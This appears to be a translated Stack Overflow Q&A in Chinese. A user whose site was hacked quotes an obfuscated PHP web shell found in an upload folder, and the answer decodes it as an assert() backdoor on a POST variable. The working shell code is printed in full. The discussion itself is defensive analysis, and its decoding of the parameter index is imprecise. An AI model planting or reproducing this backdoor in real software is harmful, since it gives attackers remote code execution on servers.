最近,我发现我的项目被黑了,我在我的图片文件夹中找到了一个脚本,其中有一个目录供用户上传他们的图片(使用文件输入)。下面是我在目录中找到的脚本。
errot_db.php
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);
?>发布于 2016-11-21 15:13:15
此代码隐藏以下语句:
@assert ($_POST[025]);这意味着它将在POST变量"025“中执行PHP代码发送。所以,是的,这确实是个后门!我建议在security.stackexchange.com上寻求关于如何正确处理后果的帮助。
https://stackoverflow.com/questions/40723302
复制相似问题